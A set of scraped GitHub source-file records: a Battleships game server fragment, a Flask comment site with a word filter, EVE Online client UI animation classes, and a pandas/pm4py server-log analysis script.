Time to say goodbye!!!\")\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\ttraceback.print_exc(file=sys.stdout)\r\n\tfinally:\r\n\t\tfor t in threads:\r\n\t\t\tt.join()\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tprint(\"Waiting for all active games to finish\")\r\n\tprint(\"The end\")\r\n\tsys.exit(0) \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","repo_name":"gautam-balamurali/Multiplayer-Battleships","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13652689583","text":"# from flask import Flask\n# from flask import request,render_template\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlite3\nfrom contextlib import closing\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nimport parser\n\n# FOllowed\n#https://github.com/mitsuhiko/flask/blob/master/examples/flaskr/flaskr.py\nDATABASE = 'Data/flask.db'\nDEBUG = True\nSECRET_KEY = 'development key'\nUSERNAME = 'admin'\nPASSWORD = 'default'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n\n\"\"\"\nCode to initialize the database\n\"\"\"\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('Data/schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n\"\"\"\nCode to connect to our database\n\"\"\"\ndef connect_db():\n rv = sqlite3.connect('DATABASE')\n rv.row_factory = sqlite3.Row\n return rv\n # return sqlite3.connect('DATABASE')\n\n\"\"\"\nCode to get our db so we can get entries\n\"\"\"\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\"\"\"\nCode to close your databse\n\"\"\"\n@app.teardown_appcontext\ndef close_connection(exception):\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n\"\"\"\nLanding page will just have assignments and will render index.html\n\"\"\"\n@app.route('/')\ndef landing():\n svn_list = parser.parse_svn()\n db = get_db()\n cur = db.execute('select title, text from entries order by id desc')\n entries = cur.fetchall()\n return render_template('index.html',svn_list=svn_list[0],svn_log=svn_list[1],entries=entries)\n\n\n\n\"\"\"\niframe redirect page will add comments we will check if the comment\nis a original comment or reply and add to corresponding data base\nwe will also filter and check that naughty words are not being used\n\"\"\"\n@app.route('/add//', methods=['POST'])\ndef add_entry(directory,path):\n db = get_db()\n unique_file = directory + \"-\" + path\n if request.form['text'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n if request.form['title'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n\n if request.form['reply'] == \"\":\n title = request.form['title']\n text = request.form['text']\n title,text = filter(request.form['title'],request.form['text'])\n db.execute('insert into entries (title, text,file) values (?, ?, ?)',\n [title, text,unique_file])\n db.commit()\n else:\n title = request.form['title']\n text = request.form['text']\n reply = request.form['reply']\n title,text = filter(request.form['title'],request.form['text'])\n print('This is STUPID')\n db.execute('insert into reply_entries (parent_id,title, text,file) values (?, ?, ?,?)',\n [str(reply),title, text,unique_file])\n db.commit()\n return 
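Note that connect_db in the Flask record opens a file literally named 'DATABASE' (the constant is quoted) rather than the Data/flask.db path configured above it. A sketch of the intended pattern, reading the path from app.config as in the Flaskr example the record says it follows:

import sqlite3
from flask import Flask, g

app = Flask(__name__)
app.config["DATABASE"] = "Data/flask.db"

def connect_db():
    # use the configured path, not the literal string 'DATABASE'
    rv = sqlite3.connect(app.config["DATABASE"])
    rv.row_factory = sqlite3.Row   # rows support column access by name
    return rv

def get_db():
    if not hasattr(g, "sqlite_db"):
        g.sqlite_db = connect_db()
    return g.sqlite_db

@app.teardown_appcontext
def close_db(exception):
    if hasattr(g, "sqlite_db"):
        g.sqlite_db.close()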
redirect(url_for('iframe',path=path,directory=directory))\n\n\"\"\"\nFor when you click on a specific assignment\ngives you details about all files in assignment\n\"\"\"\n@app.route('/')\ndef files(files):\n svn_list = parser.parse_svn()\n return render_template('details.html',svn_list=svn_list[0],\n svn_log=svn_list[1],assignment=files)\n\n\n\"\"\"\niframe page will display comments so we will get tables from etnries and reply_entries table\n\"\"\"\n@app.route('//')\ndef iframe(directory,path):\n svn_list = parser.parse_svn()\n db = get_db()\n # filter(request.form['title'],request.form['text'])\n\n db.commit()\n comment = db.execute('select title, text, file,id from entries order by id desc')\n replies = db.execute('select title,text,parent_id from reply_entries order by child_id desc')\n\n entries = comment.fetchall()\n replies = replies.fetchall()\n return render_template('show_entries.html',svn_list=svn_list[0],svn_log=svn_list[1],\n path=path,directory=directory,entries=entries,replies=replies)\n\n\"\"\"\nFilter function will check naught words table and check text and title\nand will replace any naught words\n\"\"\"\ndef filter(title,text):\n db = get_db()\n cur = db.execute('select * from naughty_words')\n replace = cur.fetchall()\n for word in replace:\n if word[0] in title:\n title = title.replace(word[0],word[1])\n if word[0] in text:\n text = text.replace(word[0],word[1])\n return title,text\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"alekfestekjian/WebPortfolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33638891933","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/ui/station/captainsquarters/screenControls.py\nimport blue\nimport trinity\nimport uicls\nimport uiconst\nimport uthread\nimport uiutil\nimport util\nimport math\nimport random\nTIME_BASE = 0.3\n\nclass ScreenWedgeBracketTop(uicls.Transform):\n __guid__ = 'uicls.ScreenWedgeBracketTop'\n default_name = 'ScreenWedgeBracketTop'\n default_hasCorners = True\n default_wedgeWidth = 100\n default_wedgeTopStart = -10\n default_wedgePosRatio = 0.5\n default_align = uiconst.TOTOP\n default_height = 25\n default_rotation = 0.0\n\n def ApplyAttributes(self, attributes):\n global TIME_BASE\n uicls.Transform.ApplyAttributes(self, attributes)\n TIME_BASE = 0.3\n self.hasCorners = attributes.get('hasCorners', self.default_hasCorners)\n wedgeWidth = attributes.get('wedgeWidth', self.default_wedgeWidth)\n wedgeTopStart = attributes.get('wedgeTopStart', self.default_wedgeTopStart)\n self.wedgePosRatio = attributes.get('wedgePosRatio', self.default_wedgePosRatio)\n self.borderLeft = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderLeft.png', cornerSize=16, align=uiconst.TOPLEFT, pos=(0, 1, 200, 48), padLeft=2, color=util.Color.WHITE)\n self.wedge = uicls.Frame(parent=self, name='wedge', texturePath='res:/UI/Texture/classes/CQMainScreen/wedge.png', cornerSize=13, align=uiconst.TOPLEFT, pos=(300,\n wedgeTopStart,\n wedgeWidth,\n 27), padding=(-5, 0, -5, 0), color=util.Color.WHITE)\n self.borderRight = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderRight.png', cornerSize=16, align=uiconst.TOPRIGHT, pos=(0, 1, 200, 48), padRight=2, color=util.Color.WHITE)\n if self.hasCorners:\n self.cornerLeft = 
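The filter function above swaps banned substrings with str.replace, which also rewrites words that merely contain a banned term. If whole-word matching is wanted, a word-boundary regex is the usual fix; a sketch with a hypothetical replacement table standing in for the naughty_words rows:

import re

# hypothetical (word, replacement) table
REPLACEMENTS = {"darn": "d***", "heck": "h***"}

def filter_text(text):
    for word, sub in REPLACEMENTS.items():
        # \b keeps 'heckler' intact while still catching 'heck'
        text = re.sub(rf"\b{re.escape(word)}\b", sub, text, flags=re.IGNORECASE)
    return text

print(filter_text("What the heck, you heckler"))  # -> What the h***, you heckler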
uicls.Sprite(parent=self, name='cornerLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerLeft.png', pos=(0, 0, 22, 22))\n self.cornerRight = uicls.Sprite(parent=self, name='cornerRight', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerRight.png', pos=(0, 0, 22, 22), align=uiconst.TOPRIGHT)\n\n def _OnResize(self):\n if not hasattr(self, 'wedge'):\n return\n self.UpdatePosition()\n\n def UpdatePosition(self):\n w, h = self.GetAbsoluteSize()\n self.wedge.left = (w - self.wedge.width) * self.wedgePosRatio\n self.borderLeft.width = self.wedge.left\n self.borderRight.width = w - self.wedge.left - self.wedge.width\n\n def AnimAppear(self):\n if self.hasCorners:\n uicore.animations.FadeIn(self.cornerLeft, duration=TIME_BASE / 3, loops=3)\n uicore.animations.FadeIn(self.cornerRight, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.FadeIn(self.borderLeft, duration=TIME_BASE)\n uicore.animations.FadeIn(self.borderRight, duration=TIME_BASE)\n uicore.animations.FadeIn(self.wedge, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.wedge, 'top', self.wedge.top, 0, duration=TIME_BASE, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self)\n\n\nclass ScreenWedgeBracketBottom(ScreenWedgeBracketTop):\n __guid__ = 'uicls.ScreenWedgeBracketBottom'\n default_name = 'ScreenWedgeBracketBottom'\n default_align = uiconst.TOBOTTOM\n default_rotation = math.pi\n\n\nclass ScreenSimpleBracketTop(uicls.Frame):\n __guid__ = 'uicls.ScreenSimpleBracketTop'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketTop.png'\n default_cornerSize = 21\n default_align = uiconst.TOTOP\n default_height = 21\n default_color = util.Color.WHITE\n\n def AnimAppear(self):\n uicore.animations.FadeIn(self, duration=TIME_BASE)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self, duration=TIME_BASE)\n\n\nclass ScreenSimpleBracketBottom(ScreenSimpleBracketTop):\n __guid__ = 'uicls.ScreenSimpleBracketBottom'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketBottom.png'\n default_align = uiconst.TOBOTTOM\n\n\nclass ScreenFrameBase(uicls.Container):\n __guid__ = 'uicls._ScreenFrameBase'\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.bracketLayer = uicls.Container(name='bracketCont', parent=self)\n self.mainCont = uicls.Container(name='mainCont', parent=self)\n self.topBracket = None\n self.bottomBracket = None\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n w, h = self.GetAbsoluteSize()\n uicore.animations.MorphScalar(self.topBracket, 'padTop', h / 2, 0, duration=TIME_BASE)\n uicore.animations.MorphScalar(self.bottomBracket, 'padBottom', h / 2, 0, duration=TIME_BASE, sleep=True)\n for obj in self.bracketLayer.children:\n uthread.new(obj.AnimAppear)\n blue.pyos.synchro.SleepWallclock(200)\n\n blue.pyos.synchro.SleepWallclock(2000)\n for c in self.mainCont.children:\n if hasattr(c, 'AnimAppear'):\n uthread.new(c.AnimAppear)\n\n\nclass ScreenFrame1(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame1'\n default_name = 'ScreenFrame1'\n\n def ApplyAttributes(self, attributes):\n uicls._ScreenFrameBase.ApplyAttributes(self, attributes)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=math.pi, align=uiconst.TOBOTTOM)\n self.topBracket = 
uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=0)\n\n\nclass ScreenFrame2(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame2'\n default_name = 'ScreenFrame2'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame3(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame3'\n default_name = 'ScreenFrame3'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n\n\nclass ScreenFrame4(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame4'\n default_name = 'ScreenFrame4'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame5(ScreenFrame1):\n __guid__ = 'uicls.ScreenFrame5'\n default_name = 'ScreenFrame5'\n\n def ApplyAttributes(self, attributes):\n ScreenFrame1.ApplyAttributes(self, attributes)\n ScreenBlinkingSquares(parent=self.bracketLayer, padLeft=50, padBottom=-5, padRight=15)\n\n\nclass ScreenHeading1(uicls.Container):\n __guid__ = 'uicls.ScreenHeading1'\n default_name = 'ScreenHeading1'\n default_align = uiconst.TOTOP\n default_fillColor = (0.180392157, 0.219607843, 0.239215686, 1.0)\n default_gradientColor = (0.152941176, 0.168627451, 0.17254902, 1.0)\n default_leftContWidth = 60\n default_height = 60\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n fillColor = attributes.get('fillColor', self.default_fillColor)\n gradientColor = attributes.get('gradientColor', self.default_gradientColor)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n appear = attributes.get('appear', False)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n uicls.Fill(name='leftBg', bgParent=self.leftCont, color=fillColor)\n self.mainCont = uicls.Container(name='mainCont', parent=self, padLeft=0, padRight=0)\n gradient = uicls.Sprite(name='rightGradient', bgParent=self.mainCont, color=gradientColor, texturePath='res:/UI/Texture/classes/CQMainScreen/gradientHoriz.png')\n if appear:\n uthread.new(self.AnimAppear)\n else:\n self.opacity = 0.0\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n w, h = self.GetAbsoluteSize()\n self.opacity = 1.0\n uicore.animations.MorphScalar(self.leftCont, 'displayWidth', 0, self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.leftCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.mainCont, 'displayWidth', 0, w - self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.mainCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n\n\nclass ScreenHeading2(uicls.Container):\n __guid__ = 'uicls.ScreenHeading2'\n default_name = 'ScreenHeading2'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n default_hasBargraph = True\n\n def ApplyAttributes(self, attributes):\n 
uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.hasBargraph = attributes.get('hasBargraph', self.default_hasBargraph)\n rightCont = uicls.Container(name='rightCont', parent=self, align=uiconst.TORIGHT, width=446, padBottom=5)\n uicls.Sprite(name='rightGraphics', parent=rightCont, align=uiconst.TOBOTTOM, texturePath='res:/UI/Texture/classes/CQMainScreen/heading2.png', height=14)\n uicls.Fill(name='thickLine', parent=self, align=uiconst.TOBOTTOM, height=6, padBottom=9, color=util.Color.WHITE)\n self.label = uicls.Label(parent=self, text=text, top=10, fontsize=30, color=util.Color.WHITE)\n self.movingFill = uicls.Fill(name='movingFill', parent=self, align=uiconst.BOTTOMRIGHT, pos=(0, 0, 100, 3), color=util.Color.WHITE)\n if self.hasBargraph:\n barGraphCont = uicls.Container(name='bargraphCont', parent=self, align=uiconst.TOPRIGHT, pos=(10, 8, 332, 31))\n self.barGraph = uicls.Sprite(name='barGraph', parent=barGraphCont, texturePath='res:/UI/Texture/classes/CQMainScreen/barGraph.png', align=uiconst.CENTER, width=barGraphCont.width, height=31)\n self.barGraph.color.a = 0.6\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uicore.animations.MorphScalar(self.movingFill, 'left', 0, 244, loops=uiconst.ANIM_REPEAT, curveType=uiconst.ANIM_WAVE, duration=2.0)\n if self.hasBargraph:\n uicore.animations.MorphScalar(self.barGraph, 'height', 0, 45, curveType=uiconst.ANIM_RANDOM, duration=1.0)\n\n\nclass ScreenHeading3(uicls.Container):\n __guid__ = 'uicls.ScreenHeading3'\n default_name = 'ScreenHeading3'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.label = uicls.EveLabelMedium(parent=self, align=uiconst.CENTER, fontsize=self.height - 25, text=text)\n uicls.Fill(bgParent=self, color=(0.5, 0.5, 0.5, 1.0))\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n uicore.animations.BlinkIn(self, sleep=True)\n uicore.animations.BlinkIn(self.label, sleep=True)\n uicore.animations.MorphScalar(self.label, 'opacity', startVal=1.0, endVal=0.5, curveType=uiconst.ANIM_WAVE, loops=uiconst.ANIM_REPEAT)\n\n\nclass ScreenBlinkingSquares(uicls.Container):\n __guid__ = 'uicls.ScreenBlinkingSquares'\n default_name = 'ScreenBlinkingSquares'\n default_height = 10\n default_align = uiconst.TOBOTTOM\n default_opacity = 0.0\n default_padBottom = 10\n default_padLeft = 10\n default_padRight = 10\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n left1 = uicls.Fill(name='left1', parent=self, align=uiconst.TOLEFT, width=8, padBottom=5, color=util.Color.WHITE)\n left2 = uicls.Fill(name='left2', parent=self, align=uiconst.TOLEFT, width=30, padLeft=3, color=util.Color.WHITE)\n left3 = uicls.Fill(name='left3', parent=self, align=uiconst.TOLEFT, width=8, padLeft=3, color=util.Color.WHITE)\n self.label = uicls.EveLabelSmall(parent=self, align=uiconst.TOLEFT, width=100, padLeft=5)\n self.right1 = uicls.Fill(name='right1', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE)\n self.right2 = uicls.Fill(name='right2', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, 
padRight=3)\n self.right3 = uicls.Fill(name='right3', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uthread.new(self.UpdateBitCounter)\n uthread.new(self.UpdateText)\n\n def UpdateText(self):\n x1 = 10000\n x2 = 30000\n msgList = ['59 4F 55 20',\n '48 41 56 45',\n '20 57 41 59',\n '20 54 4F 4F',\n '20 4D 55 43',\n '48 20 54 49',\n '4D 45 20 4F',\n '4E 20 59 4F',\n '55 52 20 48',\n '41 4E 44 53']\n while not self.destroyed:\n for msg in msgList:\n self.label.text = '%s' % msg\n uicore.animations.FadeIn(self.label, duration=TIME_BASE / 3, loops=3)\n blue.pyos.synchro.SleepWallclock(random.randint(1000, 2000))\n if self.label.destroyed:\n return\n\n def UpdateBitCounter(self):\n count = 0\n while not self.destroyed:\n val = max(0.2, count & 1)\n uicore.animations.FadeTo(self.right1, self.right1.opacity, val)\n val = max(0.2, count >> 1 & 1)\n uicore.animations.FadeTo(self.right2, self.right2.opacity, val)\n val = max(0.2, count >> 2 & 1)\n uicore.animations.FadeTo(self.right3, self.right3.opacity, val)\n count += 1\n if count == 8:\n count = 0\n blue.pyos.synchro.SleepWallclock(1000)\n\n\nclass AutoTextScroll(uicls.Container):\n __guid__ = 'uicls.AutoTextScroll'\n default_name = 'AutoScrollHorizontal'\n default_scrollSpeed = 10\n default_clipChildren = True\n default_textList = None\n default_fontSize = 30\n default_fadeColor = util.Color.BLACK\n default_fadeWidth = 100\n default_color = util.Color.WHITE\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n textList = attributes.get('textList', self.default_textList)\n self.scrollSpeed = attributes.get('scrollSpeed', self.default_scrollSpeed)\n self.fontSize = attributes.get('fontSize', self.default_fontSize)\n fadeColor = attributes.get('fadeColor', self.default_fadeColor)\n fadeWidth = attributes.get('fadeWidth', self.default_fadeWidth)\n self.color = attributes.get('color', self.default_color)\n self.scrollThread = None\n if fadeColor:\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientLeft.png', color=fadeColor, align=uiconst.TOLEFT, width=fadeWidth, state=uiconst.UI_DISABLED)\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientRight.png', color=fadeColor, align=uiconst.TORIGHT, width=fadeWidth, state=uiconst.UI_DISABLED)\n self.textCont = uicls.Container(name='textCont', parent=self, align=uiconst.CENTERLEFT, height=self.fontSize)\n if textList:\n self.SetTextList(textList)\n\n def SetTextList(self, textList, funcList = None, funcKeywordsList = None):\n self.textCont.Flush()\n if self.scrollThread:\n self.scrollThread.kill()\n if not textList:\n return\n x = 0\n for i, text in enumerate(textList):\n if i != 0:\n bullet = uicls.Sprite(parent=self.textCont, align=uiconst.CENTERLEFT, texturePath='res:/UI/texture/classes/CQMainScreen/bullet.png', pos=(x,\n 0,\n 11,\n 11), color=self.color)\n bulletWidth = bullet.width + 10\n else:\n bulletWidth = 0\n if funcList:\n clickFunc = funcList[i]\n else:\n clickFunc = None\n if funcKeywordsList:\n funcKeywords = funcKeywordsList[i]\n else:\n funcKeywords = None\n labelCont = uicls._AutoTextLabelCont(parent=self.textCont, clickFunc=clickFunc, funcKeywords=funcKeywords, left=x + bulletWidth, align=uiconst.TOPLEFT)\n label = uicls.Label(parent=labelCont, text='%s' % text, fontsize=self.fontSize, 
color=self.color)\n labelCont.width = label.width\n labelCont.height = label.height\n x += label.width + 10 + bulletWidth\n\n self.textCont.width = x\n self.textCont.height = label.height\n self.scrollThread = uthread.new(self.ScrollThread)\n\n def ScrollThread(self):\n w, h = self.GetAbsoluteSize()\n self.textCont.left = w\n while not self.destroyed:\n duration = self.textCont.width / float(self.scrollSpeed)\n uicore.animations.MorphScalar(self.textCont, 'left', startVal=w, endVal=-self.textCont.width, duration=duration, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n\nclass LabelCont(uicls.Container):\n __guid__ = 'uicls._AutoTextLabelCont'\n default_state = uiconst.UI_NORMAL\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.hoverFill = uicls.Fill(parent=self, color=(1.0, 1.0, 1.0, 0.0), padLeft=-5, padRight=-5)\n self.clickFunc = attributes.get('clickFunc', None)\n self.funcKeywords = attributes.get('funcKeywords', None)\n\n def OnMouseEnter(self, *args):\n if self.clickFunc:\n uicore.animations.FadeIn(self.hoverFill, endVal=0.5, duration=0.3)\n\n def OnMouseExit(self, *args):\n if self.clickFunc:\n uicore.animations.FadeOut(self.hoverFill)\n\n def OnClick(self, *args):\n if self.clickFunc:\n if self.funcKeywords:\n self.clickFunc(**self.funcKeywords)\n else:\n self.clickFunc()\n\n\nclass TextBanner(uicls.Container):\n __guid__ = 'uicls.TextBanner'\n default_height = 80\n default_align = uiconst.TOBOTTOM\n default_leftContWidth = 0\n default_scrollText = True\n default_fontSize = 30\n default_color = (0.15, 0.15, 0.15, 1.0)\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', '')\n textList = attributes.get('textList', None)\n if textList is None:\n textList = [text]\n fontSize = attributes.get('fontSize', self.default_fontSize)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n color = attributes.get('color', self.default_color)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n autoText = uicls.AutoTextScroll(parent=self, align=uiconst.TOALL, scrollSpeed=70, fontSize=fontSize, textList=textList, fadeColor=color)\n uicls.Sprite(bgParent=self, texturePath='res:/UI/Texture/Classes/CQMainScreen/autoTextGradientLeft.png', color=color)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/eve/client/script/ui/station/captainsquarters/screenControls.py","file_name":"screenControls.py","file_ext":"py","file_size_in_byte":20219,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"70435899293","text":"from numpy.core.fromnumeric import var\nfrom pm4py.objects.conversion.log import converter as log_converter\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom pm4py.objects.log.util import interval_lifecycle\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom math import sqrt\nfrom random import randint\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## Point 2\n# Since the log files are in a different format, it is necessary to make them compatible with PM4PY before processing them\ndf_web_server = pd.read_csv(\"WEB_SERVER.log\", sep=' ', header=None)\ndf_web_server[5] = (df_web_server[5] + df_web_server[6]).str.strip(\"[]\")\ndf_web_server[5] = pd.to_datetime(df_web_server[5], format='%d/%b/%Y:%H:%M:%S%z')\ndf_web_server = df_web_server.drop(labels=[0, 2, 3, 6, 9, 11, 12], 
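Two small tricks in ScreenBlinkingSquares are worth unpacking: the msgList entries are space-separated ASCII hex that decode to a readable sentence, and UpdateBitCounter drives the three squares as a 3-bit binary counter by masking count & 1, (count >> 1) & 1, and (count >> 2) & 1. Both in plain Python:

msg_list = ['59 4F 55 20', '48 41 56 45', '20 57 41 59', '20 54 4F 4F',
            '20 4D 55 43', '48 20 54 49', '4D 45 20 4F', '4E 20 59 4F',
            '55 52 20 48', '41 4E 44 53']
print(bytes.fromhex("".join(msg_list).replace(" ", "")).decode("ascii"))

for count in range(8):                        # one full 3-bit cycle
    bits = [(count >> i) & 1 for i in range(3)]
    print(count, bits)                        # e.g. 5 -> [1, 0, 1]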
axis=1)\ndf_web_server = df_web_server.rename(columns={1: \"IP\", 4: \"ID\", 5: \"TIMESTAMP\", 7: \"REQUEST\", 8: \"CODE\", 10: \"URL\"})\n\n# print(df_web_server)\n\ndf_application_server = pd.read_csv(\"APPLICATION_SERVER.log\", sep=' ', header=None)\ndf_application_server[3] = (df_application_server[3] + df_application_server[4]).str.strip(\"[]\")\ndf_application_server[3] = pd.to_datetime(df_application_server[3], format='%d/%b/%Y:%H:%M:%S%z')\ndf_application_server = df_application_server.drop(labels=[1, 2, 4, 7], axis=1)\ndf_application_server = df_application_server.rename(columns={0: \"IP\", 3: \"TIMESTAMP\", 5: \"REQUEST\", 6: \"CODE\"})\n\n# print(df_application_server)\n\ndf_joined = df_web_server.join(df_application_server[\"TIMESTAMP\"], lsuffix=\"_WS\", rsuffix=\"_AS\")\ndf_joined[\"TIME_DELTA\"] = (df_joined[\"TIMESTAMP_AS\"] - df_joined[\"TIMESTAMP_WS\"]) / pd.Timedelta(seconds=1)\n\n# print(df_joined)\n\nmy_col = [x for x in range(50)]\ndf_database_server = pd.read_csv(\"DATABASE_SERVER.log\", sep=' ', header=None, names=my_col)\ndf_database_server = df_database_server.fillna('')\ndf_database_server[0] = df_database_server[0] + ':' + df_database_server[1] + \"+0200\"\ndf_database_server[0] = pd.to_datetime(df_database_server[0], format='%Y-%m-%d:%H:%M:%S.%f%z')\n\nfor i in range(6, 17):\n df_database_server[5] = df_database_server[5] + ' ' + df_database_server[i]\n\ndel_col = [1, 2, 6]\ndel_col.extend([n for n in range(7, 50)])\ndf_database_server = df_database_server.drop(labels=del_col, axis=1)\ndf_database_server = df_database_server.rename(columns={0: \"TIMESTAMP\", 3: \"ID\", 4: \"DATABASE\", 5: \"OPERATION\"})\ndf_database_server = df_database_server[df_database_server.DATABASE == \"postgres@infinity41_sp27p\"].reset_index()\n\n# print(df_database_server)\n\n## Point 3\nsize = len(df_database_server[\"TIMESTAMP\"])\ndb_delta_times = []\ndb_timestamps = []\nfor n in range(0, size, 15):\n try:\n last_op = df_database_server.at[n+15, 'TIMESTAMP']\n except:\n last_op = df_database_server.at[size-1, \"TIMESTAMP\"]\n first_op = df_database_server.at[n, \"TIMESTAMP\"]\n time_delta = (last_op - first_op) / pd.Timedelta(seconds=1)\n db_delta_times.append(time_delta)\n db_timestamps.append(first_op)\n\n\ndf_joined[\"TIME_DELTA_DB\"] = db_delta_times[:len(df_joined)]\ndf_joined[\"TIMESTAMP_DB\"] = db_timestamps[:len(df_joined)]\n\n# print(df_joined)\n\n#Point 4\nprint(df_joined.describe())\n\nplt.subplot(2, 1, 1)\nplt.plot(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.title(\"Db time delta linechart\")\n\nplt.subplot(2, 1, 2)\nplt.scatter(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.xlabel(\"Request number\")\nplt.ylabel(\"Time delta\")\nplt.title(\"Db time delta scatter chart\")\n\n# plt.show()\n\n# Remove outliers\ndf_joined_size = len(df_joined)\ndf_joined = df_joined[df_joined.TIME_DELTA_DB < 5]\nprint(\"\\nPercentage of overdue cases {0:.2g}%\\n\".format((df_joined_size - len(df_joined)) / size * 100))\n\nprint(df_joined.describe())\n\n## Point 5\ndf_joined[\"ID\"] = df_joined[\"ID\"].astype(str)\ndf_joined = df_joined.rename(columns={\"ID\": \"case:concept:name\", \"REQUEST\": \"concept:name\", 